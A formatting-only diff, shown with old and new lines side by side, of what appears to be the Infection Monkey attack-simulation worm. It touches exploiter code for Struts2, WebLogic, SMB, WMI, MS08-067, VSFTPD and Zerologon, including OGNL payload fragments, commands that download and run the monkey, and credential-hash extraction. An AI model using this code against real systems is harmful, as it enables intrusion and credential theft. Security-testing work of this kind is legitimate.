# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % { cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
"dropper_path":remote_full_path "dropper_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, self.host,
get_monkey_depth() - 1, get_monkey_depth() - 1,
@ -128,7 +128,7 @@ class SmbExploiter(HostExploiter):
) )
else: else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % { cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
"monkey_path":remote_full_path "monkey_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
) )

View File

@ -58,8 +58,7 @@ class SSHExploiter(HostExploiter):
try: try:
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port) ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug( LOG.debug(
"Successfully logged in %s using %s users private key", self.host, "Successfully logged in %s using %s users private key", self.host, ssh_string
ssh_string
) )
self.report_login_attempt(True, user, ssh_key=ssh_string) self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh return ssh

View File

@ -48,7 +48,7 @@ class Struts2Exploiter(WebRCE):
@staticmethod @staticmethod
def get_redirected(url): def get_redirected(url):
# Returns false if url is not right # Returns false if url is not right
headers = {"User-Agent":"Mozilla/5.0"} headers = {"User-Agent": "Mozilla/5.0"}
request = urllib.request.Request(url, headers=headers) request = urllib.request.Request(url, headers=headers)
try: try:
return urllib.request.urlopen( return urllib.request.urlopen(
@ -85,7 +85,7 @@ class Struts2Exploiter(WebRCE):
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
"(#ros.flush())}" % cmd "(#ros.flush())}" % cmd
) )
headers = {"User-Agent":"Mozilla/5.0", "Content-Type":payload} headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
try: try:
request = urllib.request.Request(url, headers=headers) request = urllib.request.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output # Timeout added or else we would wait for all monkeys' output

View File

@ -26,12 +26,12 @@ def zerologon_exploiter_object(monkeypatch):
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object): def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode":0} dummy_exploit_attempt_result = {"ErrorCode": 0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result) assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object): def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode":1} dummy_exploit_attempt_result = {"ErrorCode": 1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result( assert not zerologon_exploiter_object.assess_exploit_attempt_result(
dummy_exploit_attempt_result dummy_exploit_attempt_result
) )
@ -56,15 +56,15 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS)) f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
] ]
expected_extracted_creds = { expected_extracted_creds = {
USERS[0]:{ USERS[0]: {
"RID":int(RIDS[0]), "RID": int(RIDS[0]),
"lm_hash":LM_HASHES[0], "lm_hash": LM_HASHES[0],
"nt_hash":NT_HASHES[0], "nt_hash": NT_HASHES[0],
}, },
USERS[1]:{ USERS[1]: {
"RID":int(RIDS[1]), "RID": int(RIDS[1]),
"lm_hash":LM_HASHES[1], "lm_hash": LM_HASHES[1],
"nt_hash":NT_HASHES[1], "nt_hash": NT_HASHES[1],
}, },
} }
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
@ -76,8 +76,8 @@ def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS)) f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
] ]
expected_extracted_creds = { expected_extracted_creds = {
USERS[0]:{"RID":int(RIDS[0]), "lm_hash":"", "nt_hash":""}, USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
USERS[1]:{"RID":int(RIDS[1]), "lm_hash":"", "nt_hash":""}, USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
} }
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds

View File

@ -32,8 +32,7 @@ class TestPayload(TestCase):
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix") pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
array2 = pld2.split_into_array_of_smaller_payloads() array2 = pld2.split_into_array_of_smaller_payloads()
test2 = bool( test2 = bool(
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len( array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2
array2) == 2
) )
assert test1 and test2 assert test1 and test2

View File

@ -60,12 +60,12 @@ class SmbTools(object):
return None return None
info = { info = {
"major_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"], "major_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"], "minor_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name":resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "), "server_name": resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment":resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "), "server_comment": resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path":resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "), "server_user_path": resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users":resp["InfoStruct"]["ServerInfo102"]["sv102_users"], "simultaneous_users": resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
} }
LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info)) LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info))
@ -103,10 +103,10 @@ class SmbTools(object):
) )
continue continue
share_info = {"share_name":share_name, "share_path":share_path} share_info = {"share_name": share_name, "share_path": share_path}
if dst_path.lower().startswith(share_path.lower()): if dst_path.lower().startswith(share_path.lower()):
high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),) high_priority_shares += ((ntpath.sep + dst_path[len(share_path) :], share_info),)
low_priority_shares += ((ntpath.sep + file_name, share_info),) low_priority_shares += ((ntpath.sep + file_name, share_info),)
@ -128,8 +128,7 @@ class SmbTools(object):
smb.connectTree(share_name) smb.connectTree(share_name)
except Exception as exc: except Exception as exc:
LOG.debug( LOG.debug(
"Error connecting tree to share '%s' on victim %r: %s", share_name, host, "Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc
exc
) )
continue continue
@ -153,8 +152,7 @@ class SmbTools(object):
return remote_full_path return remote_full_path
LOG.debug( LOG.debug(
"Remote monkey file is found but different, moving along with " "Remote monkey file is found but different, moving along with " "attack"
"attack"
) )
except Exception: except Exception:
pass # file isn't found on remote victim, moving on pass # file isn't found on remote victim, moving on
@ -167,8 +165,7 @@ class SmbTools(object):
file_uploaded = True file_uploaded = True
T1105Telem( T1105Telem(
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
dst_path
).send() ).send()
LOG.info( LOG.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r", "Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
@ -181,8 +178,7 @@ class SmbTools(object):
break break
except Exception as exc: except Exception as exc:
LOG.debug( LOG.debug(
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host, "Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc
exc
) )
T1105Telem( T1105Telem(
ScanStatus.SCANNED, ScanStatus.SCANNED,
@ -228,9 +224,9 @@ class SmbTools(object):
return None, None return None, None
dialect = { dialect = {
SMB_DIALECT:"SMBv1", SMB_DIALECT: "SMBv1",
SMB2_DIALECT_002:"SMBv2.0", SMB2_DIALECT_002: "SMBv2.0",
SMB2_DIALECT_21:"SMBv2.1", SMB2_DIALECT_21: "SMBv2.1",
}.get(smb.getDialect(), "SMBv3.0") }.get(smb.getDialect(), "SMBv3.0")
# we know this should work because the WMI connection worked # we know this should work because the WMI connection worked

View File

@ -122,7 +122,7 @@ class VSFTPDExploiter(HostExploiter):
# Upload the monkey to the machine # Upload the monkey to the machine
monkey_path = dropper_target_path_linux monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {"monkey_path":monkey_path, "http_path":http_path} download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path}
download_command = str.encode(str(download_command) + "\n") download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command) LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command): if self.socket_send(backdoor_socket, download_command):
@ -135,7 +135,7 @@ class VSFTPDExploiter(HostExploiter):
http_thread.stop() http_thread.stop()
# Change permissions # Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path":monkey_path} change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = str.encode(str(change_permission) + "\n") change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission) LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission) backdoor_socket.send(change_permission)
@ -146,9 +146,9 @@ class VSFTPDExploiter(HostExploiter):
self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT
) )
run_monkey = RUN_MONKEY % { run_monkey = RUN_MONKEY % {
"monkey_path":monkey_path, "monkey_path": monkey_path,
"monkey_type":MONKEY_ARG, "monkey_type": MONKEY_ARG,
"parameters":parameters, "parameters": parameters,
} }
# Set unlimited to memory # Set unlimited to memory

View File

@ -52,9 +52,9 @@ class WebRCE(HostExploiter):
self.monkey_target_paths = monkey_target_paths self.monkey_target_paths = monkey_target_paths
else: else:
self.monkey_target_paths = { self.monkey_target_paths = {
"linux":self._config.dropper_target_path_linux, "linux": self._config.dropper_target_path_linux,
"win32":self._config.dropper_target_path_win_32, "win32": self._config.dropper_target_path_win_32,
"win64":self._config.dropper_target_path_win_64, "win64": self._config.dropper_target_path_win_64,
} }
self.HTTP = [str(port) for port in self._config.HTTP_PORTS] self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist self.skip_exist = self._config.skip_exploit_if_file_exist
@ -170,7 +170,7 @@ class WebRCE(HostExploiter):
candidate_services = {} candidate_services = {}
candidate_services.update( candidate_services.update(
{ {
service:self.host.services[service] service: self.host.services[service]
for service in self.host.services for service in self.host.services
if ( if (
self.host.services[service] self.host.services[service]
@ -202,7 +202,7 @@ class WebRCE(HostExploiter):
else: else:
command = commands["windows"] command = commands["windows"]
# Format command # Format command
command = command % {"monkey_path":path, "http_path":http_path} command = command % {"monkey_path": path, "http_path": http_path}
except KeyError: except KeyError:
LOG.error( LOG.error(
"Provided command is missing/bad for this type of host! " "Provided command is missing/bad for this type of host! "
@ -372,8 +372,8 @@ class WebRCE(HostExploiter):
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp: if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.") LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = BITSADMIN_CMDLINE_HTTP % { backup_command = BITSADMIN_CMDLINE_HTTP % {
"monkey_path":dest_path, "monkey_path": dest_path,
"http_path":http_path, "http_path": http_path,
} }
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send() T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
resp = self.exploit(url, backup_command) resp = self.exploit(url, backup_command)
@ -402,7 +402,7 @@ class WebRCE(HostExploiter):
LOG.info("Started http server on %s", http_path) LOG.info("Started http server on %s", http_path)
# Choose command: # Choose command:
if not commands: if not commands:
commands = {"windows":POWERSHELL_HTTP_UPLOAD, "linux":WGET_HTTP_UPLOAD} commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
command = self.get_command(paths["dest_path"], http_path, commands) command = self.get_command(paths["dest_path"], http_path, commands)
resp = self.exploit(url, command) resp = self.exploit(url, command)
self.add_executed_cmd(command) self.add_executed_cmd(command)
@ -415,7 +415,7 @@ class WebRCE(HostExploiter):
if resp is False: if resp is False:
return resp return resp
else: else:
return {"response":resp, "path":paths["dest_path"]} return {"response": resp, "path": paths["dest_path"]}
def change_permissions(self, url, path, command=None): def change_permissions(self, url, path, command=None):
""" """
@ -430,7 +430,7 @@ class WebRCE(HostExploiter):
LOG.info("Permission change not required for windows") LOG.info("Permission change not required for windows")
return True return True
if not command: if not command:
command = CHMOD_MONKEY % {"monkey_path":path} command = CHMOD_MONKEY % {"monkey_path": path}
try: try:
resp = self.exploit(url, command) resp = self.exploit(url, command)
T1222Telem(ScanStatus.USED, command, self.host).send() T1222Telem(ScanStatus.USED, command, self.host).send()
@ -448,8 +448,7 @@ class WebRCE(HostExploiter):
return False return False
elif "No such file or directory" in resp: elif "No such file or directory" in resp:
LOG.error( LOG.error(
"Could not change permission because monkey was not found. Check path " "Could not change permission because monkey was not found. Check path " "parameter."
"parameter."
) )
return False return False
LOG.info("Permission change finished") LOG.info("Permission change finished")
@ -474,18 +473,18 @@ class WebRCE(HostExploiter):
self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path
) )
command = RUN_MONKEY % { command = RUN_MONKEY % {
"monkey_path":path, "monkey_path": path,
"monkey_type":DROPPER_ARG, "monkey_type": DROPPER_ARG,
"parameters":monkey_cmd, "parameters": monkey_cmd,
} }
else: else:
monkey_cmd = build_monkey_commandline( monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, self.vulnerable_port self.host, get_monkey_depth() - 1, self.vulnerable_port
) )
command = RUN_MONKEY % { command = RUN_MONKEY % {
"monkey_path":path, "monkey_path": path,
"monkey_type":MONKEY_ARG, "monkey_type": MONKEY_ARG,
"parameters":monkey_cmd, "parameters": monkey_cmd,
} }
try: try:
LOG.info("Trying to execute monkey using command: {}".format(command)) LOG.info("Trying to execute monkey using command: {}".format(command))
@ -556,7 +555,7 @@ class WebRCE(HostExploiter):
dest_path = self.get_monkey_upload_path(src_path) dest_path = self.get_monkey_upload_path(src_path)
if not dest_path: if not dest_path:
return False return False
return {"src_path":src_path, "dest_path":dest_path} return {"src_path": src_path, "dest_path": dest_path}
def get_default_dropper_path(self): def get_default_dropper_path(self):
""" """

View File

@ -24,8 +24,8 @@ REQUEST_TIMEOUT = 5
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
# Malicious requests' headers: # Malicious requests' headers:
HEADERS = { HEADERS = {
"Content-Type":"text/xml;charset=UTF-8", "Content-Type": "text/xml;charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) " "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
} }
@ -65,7 +65,7 @@ class WebLogic201710271(WebRCE):
def __init__(self, host): def __init__(self, host):
super(WebLogic201710271, self).__init__( super(WebLogic201710271, self).__init__(
host, {"linux":"/tmp/monkey.sh", "win32":"monkey32.exe", "win64":"monkey64.exe"} host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"}
) )
def get_exploit_config(self): def get_exploit_config(self):
@ -292,7 +292,7 @@ class WebLogic20192725(WebRCE):
return False return False
def check_if_exploitable(self, url): def check_if_exploitable(self, url):
headers = copy.deepcopy(HEADERS).update({"SOAPAction":""}) headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""})
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT) res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text: if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
return True return True

View File

@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"] _TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "Microsoft Server Service" _EXPLOITED_SERVICE = "Microsoft Server Service"
_windows_versions = { _windows_versions = {
"Windows Server 2003 3790 Service Pack 2":WindowsVersion.Windows2003_SP2, "Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2":WindowsVersion.Windows2003_SP2, "Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows 5.1":WindowsVersion.WindowsXP, "Windows 5.1": WindowsVersion.WindowsXP,
} }
def __init__(self, host): def __init__(self, host):
@ -286,7 +286,7 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % { cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path":remote_full_path "dropper_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, self.host,
get_monkey_depth() - 1, get_monkey_depth() - 1,
@ -295,7 +295,7 @@ class Ms08_067_Exploiter(HostExploiter):
) )
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % { cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path":remote_full_path "monkey_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT
) )

View File

@ -66,9 +66,7 @@ class WmiExploiter(HostExploiter):
continue continue
except socket.error: except socket.error:
LOG.debug( LOG.debug(
( ("Network error in WMI connection to %r with " % self.host) + creds_for_logging
"Network error in WMI connection to %r with " % self.host) +
creds_for_logging
) )
return False return False
except Exception as exc: except Exception as exc:
@ -112,7 +110,7 @@ class WmiExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % { cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path":remote_full_path "dropper_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, self.host,
get_monkey_depth() - 1, get_monkey_depth() - 1,
@ -121,7 +119,7 @@ class WmiExploiter(HostExploiter):
) )
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % { cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path":remote_full_path "monkey_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT
) )

View File

@ -253,9 +253,9 @@ class ZerologonExploiter(HostExploiter):
user_RID, lmhash, nthash = parts_of_secret[1:4] user_RID, lmhash, nthash = parts_of_secret[1:4]
self._extracted_creds[user] = { self._extracted_creds[user] = {
"RID":int(user_RID), # relative identifier "RID": int(user_RID), # relative identifier
"lm_hash":lmhash, "lm_hash": lmhash,
"nt_hash":nthash, "nt_hash": nthash,
} }
def store_extracted_creds_for_exploitation(self) -> None: def store_extracted_creds_for_exploitation(self) -> None:
@ -274,11 +274,11 @@ class ZerologonExploiter(HostExploiter):
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None: def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
self.exploit_info["credentials"].update( self.exploit_info["credentials"].update(
{ {
user:{ user: {
"username":user, "username": user,
"password":"", "password": "",
"lm_hash":lmhash, "lm_hash": lmhash,
"ntlm_hash":nthash, "ntlm_hash": nthash,
} }
} }
) )
@ -331,8 +331,7 @@ class ZerologonExploiter(HostExploiter):
) )
wmiexec = Wmiexec( wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
domain=self.dc_ip
) )
remote_shell = wmiexec.get_remote_shell() remote_shell = wmiexec.get_remote_shell()

View File

@ -22,24 +22,24 @@ __author__ = "itamar"
LOG = None LOG = None
LOG_CONFIG = { LOG_CONFIG = {
"version":1, "version": 1,
"disable_existing_loggers":False, "disable_existing_loggers": False,
"formatters":{ "formatters": {
"standard":{ "standard": {
"format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(" "format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"funcName)s.%(lineno)d: %(message)s" "funcName)s.%(lineno)d: %(message)s"
}, },
}, },
"handlers":{ "handlers": {
"console":{"class":"logging.StreamHandler", "level":"DEBUG", "formatter":"standard"}, "console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
"file":{ "file": {
"class":"logging.FileHandler", "class": "logging.FileHandler",
"level":"DEBUG", "level": "DEBUG",
"formatter":"standard", "formatter": "standard",
"filename":None, "filename": None,
}, },
}, },
"root":{"level":"DEBUG", "handlers":["console"]}, "root": {"level": "DEBUG", "handlers": ["console"]},
} }
@ -128,8 +128,7 @@ def main():
sys.excepthook = log_uncaught_exceptions sys.excepthook = log_uncaught_exceptions
LOG.info( LOG.info(
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, ">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
os.getpid()
) )
LOG.info(f"version: {get_version()}") LOG.info(f"version: {get_version()}")

View File

@ -100,8 +100,7 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server) WormConfiguration.command_servers.insert(0, self._default_server)
else: else:
LOG.debug( LOG.debug(
"Default server: %s is already in command servers list" % "Default server: %s is already in command servers list" % self._default_server
self._default_server
) )
def start(self): def start(self):
@ -220,7 +219,7 @@ class InfectionMonkey(object):
# Order exploits according to their type # Order exploits according to their type
self._exploiters = sorted( self._exploiters = sorted(
self._exploiters, key=lambda exploiter_:exploiter_.EXPLOIT_TYPE.value self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value
) )
host_exploited = False host_exploited = False
for exploiter in [exploiter(machine) for exploiter in self._exploiters]: for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
@ -252,8 +251,7 @@ class InfectionMonkey(object):
if len(self._exploited_machines) > 0: if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info( LOG.info(
"Sleeping %d seconds for exploited machines to connect to tunnel", "Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
time_to_sleep
) )
time.sleep(time_to_sleep) time.sleep(time_to_sleep)
@ -346,7 +344,7 @@ class InfectionMonkey(object):
startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE startupinfo.wShowWindow = SW_HIDE
subprocess.Popen( subprocess.Popen(
DELAY_DELETE_CMD % {"file_path":sys.executable}, DELAY_DELETE_CMD % {"file_path": sys.executable},
stdin=None, stdin=None,
stdout=None, stdout=None,
stderr=None, stderr=None,
@ -398,8 +396,7 @@ class InfectionMonkey(object):
return True return True
else: else:
LOG.info( LOG.info(
"Failed exploiting %r with exploiter %s", machine, "Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
exploiter.__class__.__name__
) )
except ExploitingVulnerableMachineError as exc: except ExploitingVulnerableMachineError as exc:
LOG.error( LOG.error(
@ -458,8 +455,7 @@ class InfectionMonkey(object):
""" """
if not ControlClient.find_server(default_tunnel=self._default_tunnel): if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException( raise PlannedShutdownException(
"Monkey couldn't find server with {} default tunnel.".format( "Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
self._default_tunnel)
) )
self._default_server = WormConfiguration.current_server self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server) LOG.debug("default server set to: %s" % self._default_server)

View File

@ -58,7 +58,7 @@ class WinAdvFirewall(FirewallApp):
def add_firewall_rule( def add_firewall_rule(
self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
): ):
netsh_args = {"name":name, "dir":direction, "action":action, "program":program} netsh_args = {"name": name, "dir": direction, "action": action, "program": program}
netsh_args.update(kwargs) netsh_args.update(kwargs)
try: try:
if _run_netsh_cmd("advfirewall firewall add rule", netsh_args): if _run_netsh_cmd("advfirewall firewall add rule", netsh_args):
@ -70,7 +70,7 @@ class WinAdvFirewall(FirewallApp):
return None return None
def remove_firewall_rule(self, name="Firewall", **kwargs): def remove_firewall_rule(self, name="Firewall", **kwargs):
netsh_args = {"name":name} netsh_args = {"name": name}
netsh_args.update(kwargs) netsh_args.update(kwargs)
try: try:
@ -132,7 +132,7 @@ class WinFirewall(FirewallApp):
program=sys.executable, program=sys.executable,
**kwargs, **kwargs,
): ):
netsh_args = {"name":name, "mode":mode, "program":program} netsh_args = {"name": name, "mode": mode, "program": program}
netsh_args.update(kwargs) netsh_args.update(kwargs)
try: try:
@ -153,7 +153,7 @@ class WinFirewall(FirewallApp):
program=sys.executable, program=sys.executable,
**kwargs, **kwargs,
): ):
netsh_args = {"program":program} netsh_args = {"program": program}
netsh_args.update(kwargs) netsh_args.update(kwargs)
try: try:
if _run_netsh_cmd("firewall delete %s" % rule, netsh_args): if _run_netsh_cmd("firewall delete %s" % rule, netsh_args):

View File

@ -52,7 +52,6 @@ if is_windows_os():
local_hostname = socket.gethostname() local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2] return socket.gethostbyname_ex(local_hostname)[2]
def get_routes(): def get_routes():
raise NotImplementedError() raise NotImplementedError()
@ -60,12 +59,10 @@ if is_windows_os():
else: else:
from fcntl import ioctl from fcntl import ioctl
def local_ips(): def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()] valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips return valid_ips
def get_routes(): # based on scapy implementation for route parsing def get_routes(): # based on scapy implementation for route parsing
try: try:
f = open("/proc/net/route", "r") f = open("/proc/net/route", "r")

View File

@ -17,21 +17,21 @@ class PostgreSQLFinger(HostFinger):
# Class related consts # Class related consts
_SCANNED_SERVICE = "PostgreSQL" _SCANNED_SERVICE = "PostgreSQL"
POSTGRESQL_DEFAULT_PORT = 5432 POSTGRESQL_DEFAULT_PORT = 5432
CREDS = {"username":ID_STRING, "password":ID_STRING} CREDS = {"username": ID_STRING, "password": ID_STRING}
CONNECTION_DETAILS = { CONNECTION_DETAILS = {
"ssl_conf":"SSL is configured on the PostgreSQL server.\n", "ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n", "ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n", "all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n", "all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR " "selected_ssl": "SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n", "non-SSL usage is forced.\n",
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR " "selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n", "SSL usage is forced.\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n", "only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
} }
RELEVANT_EX_SUBSTRINGS = { RELEVANT_EX_SUBSTRINGS = {
"no_auth":"password authentication failed", "no_auth": "password authentication failed",
